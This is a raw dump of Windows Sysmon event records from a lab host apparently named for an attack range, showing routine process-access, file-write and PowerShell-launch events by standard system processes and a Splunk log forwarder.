12:06:01.440{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.424{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.424{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.408{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.408{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4D01-00000000AE01}2956C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.361{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.361{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=9C14D61CF943F5572B1E8EB1F812A532,SHA256=8D482A08CD7E25E299EBA09C7D766671F22E8239C0B2F1ED6C5C7F8184DC4E26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000009813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-65A9-6064-4C01-00000000AE01}3980C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.143{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.143{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000009809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.143{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\container.dat2021-03-31 12:06:01.143 10341000x80000000000000009808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.127{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+ab790|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000009807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.127{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+ab271|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:01.065{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12273002EB31286C76C59414F78D5FA3,SHA256=527A2D07C6B1187CA1AF20989D51DF25E4CE395437B3B800EBA79E72559CB06A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:02.408{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E336BFCEC3CC823873739889FC9E99F9,SHA256=E65097371948D7A365F01428E4029CC7AC900ACC1F4C7CD906A24D9CF06617A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.985{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.985{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.985{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.985{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.985{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.985{266CAFBE-64C5-6064-A500-00000000AE01}43563144C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\windows.storage.dll+2d1a2|C:\Windows\System32\windows.storage.dll+2ce99|C:\Windows\System32\windows.storage.dll+2cd6f|C:\Windows\System32\SHELL32.dll+d6d17|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+167aaf 154100x80000000000000009862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.980{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x80000000000000009861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 